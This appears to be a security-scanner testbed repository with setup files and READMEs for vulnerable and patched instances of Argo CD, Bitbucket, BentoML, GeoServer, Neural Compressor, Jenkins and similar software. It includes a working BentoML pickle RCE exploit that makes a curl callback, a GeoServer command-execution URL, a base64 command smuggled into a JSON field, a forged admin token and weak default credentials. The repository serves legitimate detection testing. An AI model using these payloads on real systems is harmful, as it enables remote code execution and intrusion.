$'argocd.token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhZG1pbiJ9.TGGTTHuuGpEU8WgobXxkrBtW3NiR3dgw5LR-1DEW3BQ' $'https://127.0.0.1:8081/api/v1/certificates' 28 | ``` 29 | 30 | # setup safe instance (v2.3.4) 31 | 32 | ```bash 33 | kubectl create namespace argocdsafe 34 | kubectl apply -n argocdsafe -f https://raw.githubusercontent.com/argoproj/argo-cd/v2.3.4/manifests/install.yaml 35 | kubectl edit -n argocdsafe cm argocd-cm -o yaml 36 | ``` 37 | 38 | append the following: 39 | ```yaml 40 | data: 41 | users.anonymous.enabled: "true" 42 | ``` 43 | 44 | check anonymous access is enabled: 45 | `kubectl get -n argocdsafe cm argocd-cm -o jsonpath='{.data.users\.anonymous\.enabled}'` 46 | 47 | give access to the server from 127.0.0.1:8081 for testing the plugin: 48 | `kubectl port-forward svc/argocd-server -n argocdsafe 8081:443` 49 | 50 | check it manually in another shell: 51 | ```bash 52 | curl -i -s -k -X $'GET' -H $'Host: 127.0.0.1:8081' -b $'argocd.token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhZG1pbiJ9.TGGTTHuuGpEU8WgobXxkrBtW3NiR3dgw5LR-1DEW3BQ' $'https://127.0.0.1:8081/api/v1/certificates' 53 | ``` 54 | -------------------------------------------------------------------------------- /argo-cd/weak_credentials/README.md: -------------------------------------------------------------------------------- 1 | 2 | # setup requirements 3 | 1. k8s with minikube: https://minikube.sigs.k8s.io/docs/start/ (we can use original k8s but this is a easy solution) 4 | 2. please don't forget to add alias kubectl="minikube kubectl --" to your shell environment. 5 | 6 | # vulnerable instance 7 | ```bash 8 | kubectl create namespace argocd 9 | kubectl apply -n argocd -f https://raw.githubusercontent.com/argoproj/argo-cd/stable/manifests/install.yaml 10 | # set default password for admin: 11 | kubectl -n argocd patch secret argocd-secret \ 12 | -p '{"stringData": { 13 | "admin.password": "$2a$10$hDj12Tw9xVmvybSahN1Y0.f9DZixxN8oybyA32Uy/eqWklFU4Mo8O", 14 | "admin.passwordMtime": "'$(date +%FT%T%Z)'" 15 | }}' 16 | kubectl port-forward svc/argocd-server -n argocd 8082:443 17 | ``` 18 | Open your browser, go to the address https://127.0.0.1:8082, and enter the credentials `admin:Password1!` on the login page. 19 | 20 | # secure instance 21 | ```bash 22 | kubectl create namespace argocd 23 | kubectl apply -n argocd -f https://raw.githubusercontent.com/argoproj/argo-cd/stable/manifests/install.yaml 24 | kubectl port-forward svc/argocd-server -n argocd 8082:443 25 | ``` 26 | 27 | Open your browser, and go to the address https://127.0.0.1:8082, you can't use any default credentials, the new credentials are random. 28 | -------------------------------------------------------------------------------- /atlassian/bitbucket/CVE-2022-36804/README.md: -------------------------------------------------------------------------------- 1 | # Atlassian BitBucket CVE-2022-36804 2 | 3 | ## Description of Vulnerability 4 | 5 | A vulnerability(CVE-2022-36804) in Bitbucket allows a remote code execution. 6 | An attacker with access with read or public access to a 7 | repository can execute arbitrary code by sending a malicious 8 | HTTP request. All versions released after 6.10.17 9 | including 7.0.0 and newer are affected, this means that all 10 | instances that are running any versions between 7.0.0 and 11 | 8.3.0 inclusive can be exploited by this vulnerability. 12 | 13 | ## Vulnerable setup 14 | 15 | 1. download image and run the container 16 | 17 | ```sh 18 | docker run --name="tsunami-bitbucket-8-3" -d -p 37990:7990 -p 37999:7999 atlassian/bitbucket:8.3.0 19 | ``` 20 | 21 | 2. The instance will be available on port 37990 22 | 3. Install bitbucket, fill license code and create the administrator account 23 | 4. Create a public repository (Repository settings > Repository permissions > Public Access) 24 | 5. Add at least one file to the repository 25 | 6. Ensure a default branch is selected 26 | 27 | ## Non-vulnerable setup 28 | 29 | Only the version of the bitbucket container needs to be changed: 30 | 31 | ```sh 32 | docker run --name="tsunami-bitbucket-8-3" -d -p 37990:7990 -p 37999:7999 atlassian/bitbucket:8.3.1 33 | ``` 34 | -------------------------------------------------------------------------------- /atlassian/confluence/CVE-2023-22518/README.md: -------------------------------------------------------------------------------- 1 | # Atlassian Confluence CVE-2023-22512 2 | 3 | ## Vulnerable setup 4 | 5 | You will need to expose a PostgreSQL instance to the confluence environment. You 6 | will need the IP address of the `docker0` interface (or any other interface that 7 | is used by your docker daemon). 8 | 9 | In the following example, the IP address `172.17.0.1` is used as an example: 10 | 11 | ```sh 12 | $ docker run --rm --name confluencePG -e POSTGRES_USER=confluence -e POSTGRES_PASSWORD=confluence -e POSTGRES_DB=confluence -p "172.17.0.1:5432:5432" -d postgres 13 | $ docker run --rm --name confluence -d -p 8090:8090 -p 8091:8091 atlassian/confluence:8.5.1-ubuntu-jdk11 14 | ``` 15 | 16 | Note: The instances are stateless and shutting them down will reset all changes. 17 | 18 | Once the instances are running, you can navigate to http://127.0.0.1:8090 and 19 | start setting up the confluence instance. The vulnerability will only be 20 | triggered once the full installation has been finalized. 21 | 22 | ## Non-vulnerable setup 23 | 24 | Only the version of the Confluence container needs to be changed: 25 | 26 | ```sh 27 | $ docker run --rm --name confluencePG -e POSTGRES_USER=confluence -e POSTGRES_PASSWORD=confluence -e POSTGRES_DB=confluence -p "172.17.0.1:5432:5432" -d postgres 28 | $ docker run --rm --name confluence -d -p 8090:8090 -p 8091:8091 atlassian/confluence:8.6.1-ubuntu-jdk11 29 | ``` 30 | -------------------------------------------------------------------------------- /bentoml/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:22.04 2 | RUN mkdir /workdir 3 | WORKDIR /workdir 4 | COPY service.py /workdir/ 5 | RUN apt update \ 6 | && apt install curl python3.11 python3-pip python3.11-venv -y 7 | ARG BENTOML_VERSION 8 | RUN pip3 install pydantic==2.8.2 bentoml==${BENTOML_VERSION} 9 | CMD bentoml serve service:Summarization 10 | -------------------------------------------------------------------------------- /bentoml/README.md: -------------------------------------------------------------------------------- 1 | # vulnerble version setup 2 | 3 | ```bash 4 | docker compose -f docker-compose-vulnerable.yml up 5 | ``` 6 | run the exploit: 7 | ``` 8 | ncat -klnv 1337 9 | python3 exploit.py 10 | ``` 11 | you'll receive a http request on port 1337 which means the exploit worked. 12 | 13 | # safe version setup 14 | 15 | ```bash 16 | docker compose -f docker-compose-safe.yml up 17 | ``` 18 | run the exploit: 19 | ``` 20 | ncat -klnv 1337 21 | python3 exploit.py 22 | ``` 23 | you won't receive any data on port 1337 since the exploit didn't work. 24 | -------------------------------------------------------------------------------- /bentoml/docker-compose-safe.yml: -------------------------------------------------------------------------------- 1 | services: 2 | bentoml-safe: 3 | build: 4 | context: . 5 | args: 6 | BENTOML_VERSION: 1.2.5 7 | ports: 8 | - "3000:3000" 9 | -------------------------------------------------------------------------------- /bentoml/docker-compose-vulnerable.yml: -------------------------------------------------------------------------------- 1 | services: 2 | bentoml-vuln: 3 | build: 4 | context: . 5 | args: 6 | BENTOML_VERSION: 1.2.0 7 | ports: 8 | - "3000:3000" 9 | -------------------------------------------------------------------------------- /bentoml/exploit.py: -------------------------------------------------------------------------------- 1 | import pickle, os, requests 2 | 3 | url = input("Please specify the URL that will receive the callback: ") 4 | print(f"Command that will be executed: curl {url}") 5 | class P(object): 6 | def __reduce__(self): 7 | return (os.system, (f"curl {url}",)) 8 | 9 | requests.post('http://127.0.0.1:3000/summarize', data=pickle.dumps(P()), 10 | headers={"Content-Type": "application/vnd.bentoml+pickle"}) 11 | -------------------------------------------------------------------------------- /bentoml/service.py: -------------------------------------------------------------------------------- 1 | from __future__ import annotations 2 | import bentoml 3 | 4 | @bentoml.service( 5 | resources={"cpu": "2"}, 6 | traffic={"timeout": 10}, 7 | ) 8 | class Summarization: 9 | def __init__(self) -> None: 10 | pass 11 | 12 | @bentoml.api 13 | def summarize(self, text: str) -> str: 14 | return "Hello World" 15 | -------------------------------------------------------------------------------- /couchbase/weak_credentials/couchbase.md: -------------------------------------------------------------------------------- 1 | # Couchbase 2 | # Setup 3 | 4 | 1. Create docker image with this command: `docker run -d --name some-couch -p 8091-8097:8091-8097 -p 9123:9123 -p 11207:11207 -p 11210:11210 -p 11280:11280 -p 18091-18097:18091-18097 couchbase` 5 | 6 | 2. Connect to the db: Go to `localhost:8091` and finish set up 7 | 8 | 3. Verify Couchbase is working as intended: `curl 127.0.0.1:8091/pools --user "Administrator:example"` -------------------------------------------------------------------------------- /drupal/CVE-2018-7600/README.md: -------------------------------------------------------------------------------- 1 | # Drupal CVE-2018-7600 2 | 3 | This directory contains the deployment config for Drupal with exposed endpoint 4 | vulnerable to CVE-2018-7600. Drupal versions before 7.58, 8.x before 8.3.9, 5 | 8.4.x before 8.4.6, and 8.5.x before 8.5.1 have this vulnerability. 6 | 7 | The deployed service has name `drupal-cve-2018-7600` and listens on port `80`. 8 | 9 | -------------------------------------------------------------------------------- /drupal/CVE-2018-7600/drupal-cve-2018-7600.yaml: -------------------------------------------------------------------------------- 1 | # k8s LoadBalancer Service 2 | apiVersion: v1 3 | kind: Service 4 | metadata: 5 | name: drupal-cve-2018-7600 6 | labels: 7 | app: drupal-cve-2018-7600 8 | spec: 9 | ports: 10 | - port: 80 11 | name: http 12 | selector: 13 | app: drupal-cve-2018-7600 14 | type: LoadBalancer 15 | --- 16 | # The PHP app. 17 | apiVersion: apps/v1 18 | kind: Deployment 19 | metadata: 20 | name: drupal-cve-2018-7600 21 | labels: 22 | app: drupal-cve-2018-7600 23 | spec: 24 | selector: 25 | matchLabels: 26 | app: drupal-cve-2018-7600 27 | tier: frontend 28 | strategy: 29 | type: Recreate 30 | template: 31 | metadata: 32 | labels: 33 | app: drupal-cve-2018-7600 34 | tier: frontend 35 | spec: 36 | containers: 37 | - name: drupal-cve-2018-7600 38 | image: drupal:${drupal_version} 39 | ports: 40 | - containerPort: 80 41 | -------------------------------------------------------------------------------- /drupal/CVE-2019-6340/README.md: -------------------------------------------------------------------------------- 1 | # Drupal CVE-2019-6340 2 | 3 | This directory contains the deployment config for Drupal with exposed endpoint 4 | vulnerable to CVE-2019-6340. Drupal versions of Drupal 8.5.x before 8.5.11 and 5 | Drupal 8.6.x before 8.6.10 have this vulnerability. 6 | 7 | The deployed service has name `drupal-cve-2019-6340` and listens on port `80`. 8 | -------------------------------------------------------------------------------- /drupal/CVE-2019-6340/drupal-cve-2019-6340.yaml: -------------------------------------------------------------------------------- 1 | # k8s LoadBalancer Service 2 | apiVersion: v1 3 | kind: Service 4 | metadata: 5 | name: drupal-cve-2019-6340 6 | labels: 7 | app: drupal-cve-2019-6340 8 | spec: 9 | ports: 10 | - port: 80 11 | name: http 12 | selector: 13 | app: drupal-cve-2019-6340 14 | type: LoadBalancer 15 | --- 16 | # The PHP app. 17 | apiVersion: apps/v1 18 | kind: Deployment 19 | metadata: 20 | name: drupal-cve-2019-6340 21 | labels: 22 | app: drupal-cve-2019-6340 23 | spec: 24 | selector: 25 | matchLabels: 26 | app: drupal-cve-2019-6340 27 | tier: frontend 28 | strategy: 29 | type: Recreate 30 | template: 31 | metadata: 32 | labels: 33 | app: drupal-cve-2019-6340 34 | tier: frontend 35 | spec: 36 | containers: 37 | - name: drupal-cve-2019-6340 38 | image: gcr.io/tsunami-testbed/drupal_cve_2019_6340:latest 39 | ports: 40 | - containerPort: 80 41 | -------------------------------------------------------------------------------- /ftp/weak_credentials/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | # Usage example: https://github.com/stilliard/docker-pure-ftpd/wiki/Docker-stack-with-Wordpress-&-FTP 4 | 5 | services: 6 | ftpd_server: 7 | image: stilliard/pure-ftpd 8 | container_name: pure-ftpd 9 | ports: 10 | - "21:21" 11 | - "30000-30009:30000-30009" 12 | volumes: # remember to replace /folder_on_disk/ with the path to where you want to store the files on the host machine 13 | - "/folder_on_disk/data:/home/username/" 14 | - "/folder_on_disk/passwd:/etc/pure-ftpd/passwd" 15 | # uncomment for ssl/tls, see https://github.com/stilliard/docker-pure-ftpd#tls 16 | # - "/folder_on_disk/ssl:/etc/ssl/private/" 17 | # or ssl/tls with Let's Encrypt (cert and key as two files) 18 | # - "/etc/letsencrypt/live//cert.pem:/etc/ssl/private/pure-ftpd-cert.pem" 19 | # - "/etc/letsencrypt/live//privkey.pem:/etc/ssl/private/pure-ftpd-key.pem" 20 | environment: 21 | PUBLICHOST: "localhost" 22 | FTP_USER_NAME: username 23 | FTP_USER_PASS: mypass 24 | FTP_USER_HOME: /home/username 25 | # also for ssl/tls: 26 | # ADDED_FLAGS: "--tls=2" 27 | restart: always 28 | -------------------------------------------------------------------------------- /ftp/weak_credentials/ftp.md: -------------------------------------------------------------------------------- 1 | # FTP 2 | # Setup 3 | 4 | 1. View the docker-compose.yml file to see the selected username and password 5 | 6 | 2. Run the compose file in this directory: `docker-compose up` 7 | 8 | 3. Verify FTP is working as expected using this command: `ftp -p localhost 21` 9 | -------------------------------------------------------------------------------- /geoserver/cve_2024_36401/README.md: -------------------------------------------------------------------------------- 1 | # Vulnerable version 2 | ``` 3 | docker compose -f docker-compose-vuln.yml up 4 | curl "http://127.0.0.1:8080/geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=sf:archsites&valueReference=exec(java.lang.Runtime.getRuntime(),'touch%20/tmp/success1')" 5 | docker exec -it geoserver-vulnerable-1 /bin/bash 6 | ls /tmp/success1 7 | ``` 8 | # Patched version 9 | do the same for a secured geoserver instance at 127.0.0.1 10 | ``` 11 | docker compose -f docker-compose-safe.yml up 12 | curl "http://127.0.0.1:8080/geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=sf:archsites&valueReference=exec(java.lang.Runtime.getRuntime(),'touch%20/tmp/success2')" 13 | docker exec -it geoserver-safe-1 /bin/bash 14 | ls /tmp/success2 15 | ``` 16 | you can see there is no file with this path 17 | -------------------------------------------------------------------------------- /geoserver/cve_2024_36401/docker-compose-safe.yml: -------------------------------------------------------------------------------- 1 | services: 2 | geoserver-safe: 3 | image: docker.osgeo.org/geoserver:2.25.3 4 | ports: 5 | - "8080:8080" 6 | -------------------------------------------------------------------------------- /geoserver/cve_2024_36401/docker-compose-vuln.yml: -------------------------------------------------------------------------------- 1 | services: 2 | geoserver-vulnerable: 3 | image: docker.osgeo.org/geoserver:2.23.2 4 | ports: 5 | - "8080:8080" 6 | -------------------------------------------------------------------------------- /gradio/CVE-2023-51449/README.md: -------------------------------------------------------------------------------- 1 | # Gradio CVE-2023-51449 2 | 3 | ## Vulnerable setup 4 | 5 | ```bash 6 | docker build -t gradio:vuln -f vulnerable.Dockerfile . 7 | docker run --name gradio-vuln -p 8000:8000 -d gradio:vuln 8 | ``` 9 | 10 | Application will be available at `localhost:8000` 11 | 12 | ## Non-vulnerable setup 13 | 14 | ```bash 15 | docker build -t gradio:novuln -f non-vulnerable.Dockerfile . 16 | docker run --name gradio-novuln -p 8000:8000 -d gradio:novuln 17 | ``` 18 | 19 | Application will be available at `localhost:8000` -------------------------------------------------------------------------------- /gradio/CVE-2023-51449/non-vulnerable.Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.9-slim 2 | 3 | RUN python -m pip install gradio==4.11.0 4 | 5 | ADD test_app.py /workspace/ 6 | 7 | EXPOSE 8000 8 | 9 | CMD [ "python3" , "/workspace/test_app.py" ] -------------------------------------------------------------------------------- /gradio/CVE-2023-51449/test_app.py: -------------------------------------------------------------------------------- 1 | import gradio as gr 2 | 3 | def greet(name, intensity): 4 | return "Hello, " + name + "!" * int(intensity) 5 | 6 | demo = gr.Interface( 7 | fn=greet, 8 | inputs=["text", "slider"], 9 | outputs=["text"], 10 | ) 11 | 12 | if __name__ == "__main__": 13 | demo.launch(server_name="0.0.0.0", server_port=8000) 14 | -------------------------------------------------------------------------------- /gradio/CVE-2023-51449/vulnerable.Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.9-slim 2 | 3 | RUN python -m pip install gradio==4.10.0 4 | 5 | ADD test_app.py /workspace/ 6 | 7 | EXPOSE 8000 8 | 9 | CMD [ "python3" , "/workspace/test_app.py" ] 10 | -------------------------------------------------------------------------------- /grafana/weak_credentials/Dockerfile.Grafana: -------------------------------------------------------------------------------- 1 | FROM grafana/grafana:10.0.0 2 | 3 | ENV GF_INSTALL_PLUGINS=grafana-simple-json-datasource 4 | 5 | # override some default values 6 | ENV GF_SECURITY_ADMIN_USER=admin 7 | ENV GF_SECURITY_ADMIN_PASSWORD=qwertyuiop 8 | ENV GF_SECURITY_DISABLE_BRUTE_FORCE_LOGIN_PROTECTION=TRUE 9 | 10 | HEALTHCHECK CMD curl --fail http://localhost:3000/ || exit 11 | 12 | EXPOSE 3000 -------------------------------------------------------------------------------- /grafana/weak_credentials/grafana.md: -------------------------------------------------------------------------------- 1 | # Grafana 2 | 3 | # Note 4 | The `Dockerfile.Grafana` contains the following customization: 5 | - the admin user is created with the credential `admin:qwertyuiop` instead of the usual `admin:admin` 6 | - grafana is started with disabled brute force login protection (`GF_SECURITY_DISABLE_BRUTE_FORCE_LOGIN_PROTECTION=TRUE`) - by default it is enabled 7 | 8 | # Setup 9 | 1. Ensure the files `runAndBuildGraphana.sh` and `Dockerfile.Grafana` are in the same folder 10 | 11 | 2. Create docker images with this command: `chmod +x runAndBuildGraphana.sh && ./runAndBuildGraphana.sh` 12 | 13 | 3. Connect to http://localhost:8873/ via browser 14 | 15 | 4. Verify that grafana is running correctly by logging in with credentials `admin:qwertyuiop` 16 | -------------------------------------------------------------------------------- /grafana/weak_credentials/runAndBuildGraphana.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | set -e 3 | docker build --platform linux --no-cache -t graphana:test -f Dockerfile.Grafana . && docker run -p 127.0.0.1:8873:3000 -it --rm graphana:test -------------------------------------------------------------------------------- /h2o/exposed_ui/README.md: -------------------------------------------------------------------------------- 1 | # Exposed h2o UI 2 | This directory contains the deployment configs for h2o without authentication. 3 | The deployed service has name `h2o-ai` and listens on port `80`. -------------------------------------------------------------------------------- /h2o/exposed_ui/challenge/Dockerfile: -------------------------------------------------------------------------------- 1 | # Copyright 2020 Google LLC 2 | # 3 | # Licensed under the Apache License, Version 2.0 (the "License"); 4 | # you may not use this file except in compliance with the License. 5 | # You may obtain a copy of the License at 6 | # 7 | # https://www.apache.org/licenses/LICENSE-2.0 8 | # 9 | # Unless required by applicable law or agreed to in writing, software 10 | # distributed under the License is distributed on an "AS IS" BASIS, 11 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | # See the License for the specific language governing permissions and 13 | # limitations under the License. 14 | FROM h2oai/h2o-open-source-k8s as chroot 15 | 16 | COPY flag / 17 | COPY chal.sh /home/user/ 18 | COPY socat /home/user/ 19 | 20 | FROM gcr.io/kctf-docker/challenge@sha256:0f7d757bcda470c3bbc063606335b915e03795d72ba1d8fdb6f0f9ff3757364f 21 | 22 | COPY --from=chroot / /chroot 23 | 24 | COPY nsjail.cfg /home/user/ 25 | 26 | CMD kctf_setup && \ 27 | kctf_drop_privs \ 28 | socat \ 29 | TCP-LISTEN:1337,reuseaddr,fork \ 30 | EXEC:"nsjail --config /home/user/nsjail.cfg -- /home/user/chal.sh" -------------------------------------------------------------------------------- /h2o/exposed_ui/challenge/chal.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | java -Djava.library.path=/opt/h2oai/h2o-3/xgb_lib_dir -XX:+UseContainerSupport -XX:MaxRAMPercentage=50 -jar /opt/h2oai/h2o-3/h2o.jar 1>&2 & 3 | 4 | /home/user/socat TCP:127.0.0.1:54321,retry,forever stdio -------------------------------------------------------------------------------- /h2o/exposed_ui/challenge/nsjail.cfg: -------------------------------------------------------------------------------- 1 | # Copyright 2020 Google LLC 2 | # 3 | # Licensed under the Apache License, Version 2.0 (the "License"); 4 | # you may not use this file except in compliance with the License. 5 | # You may obtain a copy of the License at 6 | # 7 | # https://www.apache.org/licenses/LICENSE-2.0 8 | # 9 | # Unless required by applicable law or agreed to in writing, software 10 | # distributed under the License is distributed on an "AS IS" BASIS, 11 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | # See the License for the specific language governing permissions and 13 | # limitations under the License. 14 | 15 | # See options available at https://github.com/google/nsjail/blob/master/config.proto 16 | 17 | name: "default-nsjail-configuration" 18 | description: "Default nsjail configuration for pwnable-style CTF task." 19 | 20 | mode: ONCE 21 | uidmap {inside_id: "1000"} 22 | gidmap {inside_id: "1000"} 23 | rlimit_as_type: HARD 24 | rlimit_cpu_type: HARD 25 | rlimit_nofile_type: HARD 26 | rlimit_nproc_type: HARD 27 | 28 | cwd: "/home/user" 29 | 30 | keep_env: true 31 | 32 | mount: [ 33 | { 34 | src: "/chroot" 35 | dst: "/" 36 | is_bind: true 37 | }, 38 | { 39 | dst: "/tmp" 40 | fstype: "tmpfs" 41 | rw: true 42 | }, 43 | { 44 | dst: "/proc" 45 | fstype: "proc" 46 | rw: true 47 | }, 48 | { 49 | src: "/etc/resolv.conf" 50 | dst: "/etc/resolv.conf" 51 | is_bind: true 52 | }, 53 | { 54 | src: "/dev" 55 | dst: "/dev" 56 | is_bind: true 57 | }, 58 | { 59 | src: "/dev/null" 60 | dst: "/dev/null" 61 | is_bind: true 62 | } 63 | ] 64 | -------------------------------------------------------------------------------- /h2o/exposed_ui/h2o.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Service 3 | metadata: 4 | name: h2o-ai 5 | labels: 6 | app: h2o-ai 7 | spec: 8 | ports: 9 | - port: 80 10 | name: http 11 | targetPort: 54321 12 | selector: 13 | app: h2o-ai 14 | type: LoadBalancer 15 | --- 16 | apiVersion: apps/v1 17 | kind: Deployment 18 | metadata: 19 | name: h2o-ai 20 | labels: 21 | app: h2o-ai 22 | spec: 23 | selector: 24 | matchLabels: 25 | app: h2o-ai 26 | strategy: 27 | type: Recreate 28 | template: 29 | metadata: 30 | labels: 31 | app: h2o-ai 32 | spec: 33 | containers: 34 | - name: h2o-ai 35 | image: h2oai/h2o-open-source-k8s:3.44.0.3@sha256:cacf09e3811f3170d70743987a3a32ccf00c0872b5e5443befd626f2ddfa1fde 36 | ports: 37 | - containerPort: 54321 -------------------------------------------------------------------------------- /intel/neural-compressor/CVE-2024-22476/Fixed.Dockerfile: -------------------------------------------------------------------------------- 1 | # 2 | # Copyright (c) 2022 Intel Corporation 3 | # 4 | # Licensed under the Apache License, Version 2.0 (the "License"); 5 | # you may not use this file except in compliance with the License. 6 | # You may obtain a copy of the License at 7 | # 8 | # http://www.apache.org/licenses/LICENSE-2.0 9 | # 10 | # Unless required by applicable law or agreed to in writing, software 11 | # distributed under the License is distributed on an "AS IS" BASIS, 12 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 13 | # See the License for the specific language governing permissions and 14 | # limitations under the License. 15 | 16 | ARG UBUNTU_VER=20.04 17 | FROM ubuntu:${UBUNTU_VER} as deploy 18 | 19 | # See http://bugs.python.org/issue19846 20 | ENV LANG C.UTF-8 21 | ARG PYTHON=python3.8 22 | 23 | RUN apt-get update && DEBIAN_FRONTEND=noninteractive apt-get install -y --no-install-recommends --fix-missing \ 24 | ${PYTHON}-dev \ 25 | gcc \ 26 | libgl1-mesa-glx \ 27 | libglib2.0-0 \ 28 | python3 \ 29 | python3-pip \ 30 | curl \ 31 | libopenmpi-dev \ 32 | wget 33 | 34 | RUN ${PYTHON} -m pip --no-cache-dir install --upgrade \ 35 | pip \ 36 | setuptools 37 | 38 | RUN ln -sf $(which ${PYTHON}) /usr/local/bin/python && \ 39 | ln -sf $(which ${PYTHON}) /usr/local/bin/python3 && \ 40 | ln -sf $(which ${PYTHON}) /usr/bin/python && \ 41 | ln -sf $(which ${PYTHON}) /usr/bin/python3 42 | 43 | ARG INC_VER=2.5.1 44 | 45 | 46 | RUN python -m pip install --no-cache-dir neural-compressor${INC_VER:+==${INC_VER}} 47 | RUN python -m pip install --no-cache-dir neural-solution${INC_VER:+==${INC_VER}} 48 | -------------------------------------------------------------------------------- /intel/neural-compressor/CVE-2024-22476/README.md: -------------------------------------------------------------------------------- 1 | # Intel(R) Neural Compressor CVE-2024-22476 2 | 3 | This directory contains the deployment config for Intel(R) Neural Compressor instances vulnerable and fixed to CVE-2024-22476. Instances before version 2.5.0 may allow an unauthenticated user to potentially enable escalation of privilege via remote access. 4 | 5 | ## How to Trigger the Vulnerability? 6 | 7 | To trigger the vulnerability, you can use the curl and task_request.json file. In a vulnerable environment, the curl request below will create a file called attack.py under the root directory of the container. 8 | 9 | ``` 10 | curl -X POST -H "Content-Type: application/json" --data @./task_request.json http://127.0.0.1:8000/task/submit/ 11 | ``` 12 | 13 | In case you cannot trigger the vulnerability, you might need to delete your existing container images because Docker might try to reuse them. 14 | 15 | ``` 16 | sudo docker rmi -f $(sudo docker images -aq) 17 | sudo docker remove $(sudo docker ps -a -q) 18 | ``` 19 | 20 | ## Vulnerable Setup 21 | 22 | ``` 23 | docker build -t neuralcompressor:vuln -f Vulnerable.Dockerfile . 24 | docker run --name neuralcompressor-vuln --network host -it neuralcompressor:vuln bash 25 | neural_solution --conda_env test start (In the container bash) 26 | ``` 27 | 28 | Application will be available at `localhost:8000` 29 | 30 | ## Non-vulnerable Setup 31 | 32 | ``` 33 | docker build -t neuralcompressor:fixed -f Fixed.Dockerfile . 34 | docker run --name neuralcompressor-fixed --network host -it neuralcompressor:fixed bash 35 | neural_solution --conda_env test start (In the container bash) 36 | ``` 37 | 38 | Application will be available at `localhost:8000` 39 | -------------------------------------------------------------------------------- /intel/neural-compressor/CVE-2024-22476/Vulnerable.Dockerfile: -------------------------------------------------------------------------------- 1 | # 2 | # Copyright (c) 2022 Intel Corporation 3 | # 4 | # Licensed under the Apache License, Version 2.0 (the "License"); 5 | # you may not use this file except in compliance with the License. 6 | # You may obtain a copy of the License at 7 | # 8 | # http://www.apache.org/licenses/LICENSE-2.0 9 | # 10 | # Unless required by applicable law or agreed to in writing, software 11 | # distributed under the License is distributed on an "AS IS" BASIS, 12 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 13 | # See the License for the specific language governing permissions and 14 | # limitations under the License. 15 | 16 | ARG UBUNTU_VER=20.04 17 | FROM ubuntu:${UBUNTU_VER} as deploy 18 | 19 | # See http://bugs.python.org/issue19846 20 | ENV LANG C.UTF-8 21 | ARG PYTHON=python3.8 22 | 23 | RUN apt-get update && DEBIAN_FRONTEND=noninteractive apt-get install -y --no-install-recommends --fix-missing \ 24 | ${PYTHON}-dev \ 25 | gcc \ 26 | libgl1-mesa-glx \ 27 | libglib2.0-0 \ 28 | python3 \ 29 | python3-pip \ 30 | curl \ 31 | libopenmpi-dev \ 32 | wget 33 | 34 | RUN ${PYTHON} -m pip --no-cache-dir install --upgrade \ 35 | pip \ 36 | setuptools 37 | 38 | RUN ln -sf $(which ${PYTHON}) /usr/local/bin/python && \ 39 | ln -sf $(which ${PYTHON}) /usr/local/bin/python3 && \ 40 | ln -sf $(which ${PYTHON}) /usr/bin/python && \ 41 | ln -sf $(which ${PYTHON}) /usr/bin/python3 42 | 43 | ARG INC_VER=2.2 44 | 45 | 46 | RUN python -m pip install --no-cache-dir neural-compressor${INC_VER:+==${INC_VER}} 47 | RUN python -m pip install --no-cache-dir neural-solution${INC_VER:+==${INC_VER}} 48 | -------------------------------------------------------------------------------- /intel/neural-compressor/CVE-2024-22476/task_request.json: -------------------------------------------------------------------------------- 1 | { 2 | "script_url": "https://github.com/huggingface/transformers/blob/v4.21-release/examples/pytorch/text-classification & eval \"$(echo ZWNobyAiRG9tYWluIGV4cGFuc2lvbiIgPiAvYXR0YWNrLnB5 | base64 --decode)\"", 3 | "optimized": "False", 4 | "arguments": [ 5 | "--model_name_or_path bert-base-cased --task_name mrpc --do_eval --output_dir result" 6 | ], 7 | "approach": "static", 8 | "requirements": [], 9 | "workers": 1 10 | } 11 | -------------------------------------------------------------------------------- /jenkins/CVE-2017-1000353/README.md: -------------------------------------------------------------------------------- 1 | # Jenkins CVE-2017-1000353 2 | 3 | This directory contains the deployment configs for a Jenkins installation that's 4 | vulnerable to CVE-2017-1000353. 5 | 6 | The deployed service has name `jenkins-cve-2017-1000353` and listens on port 7 | `80`. 8 | -------------------------------------------------------------------------------- /jenkins/CVE-2017-1000353/jenkins.yaml: -------------------------------------------------------------------------------- 1 | # k8s LoadBalancer Service exposing the Jenkins service. 2 | apiVersion: v1 3 | kind: Service 4 | metadata: 5 | name: jenkins-cve-2017-1000353 6 | labels: 7 | app: jenkins-cve-2017-1000353 8 | spec: 9 | ports: 10 | - port: 80 11 | name: http 12 | targetPort: 8080 13 | selector: 14 | app: jenkins-cve-2017-1000353 15 | type: LoadBalancer 16 | --- 17 | # Jenkins version 2.46.1 18 | apiVersion: apps/v1 19 | kind: Deployment 20 | metadata: 21 | name: jenkins-cve-2017-1000353 22 | labels: 23 | app: jenkins-cve-2017-1000353 24 | spec: 25 | selector: 26 | matchLabels: 27 | app: jenkins-cve-2017-1000353 28 | tier: frontend 29 | strategy: 30 | type: Recreate 31 | template: 32 | metadata: 33 | labels: 34 | app: jenkins-cve-2017-1000353 35 | tier: frontend 36 | spec: 37 | containers: 38 | - name: jenkins-cve-2017-1000353 39 | image: jenkins:2.46.1 40 | ports: 41 | - containerPort: 8080 42 | -------------------------------------------------------------------------------- /jenkins/CVE-2024-23897/README.md: -------------------------------------------------------------------------------- 1 | # Jenkins CVE-2024-23897 2 | 3 | This directory contains the deployment config for Jenkins with exposed endpoint 4 | vulnerable to CVE-2024-23897. Jenkins weekly versions before 2.442 and Jenkins 5 | LTS versions before 2.426.3 have this vulnerability. 6 | 7 | The deployed service listens on port `8080` after the installation guide. 8 | 9 | ## Vulnerable version 10 | docker run -it -p 8080:8080 jenkins/jenkins:2.426.2 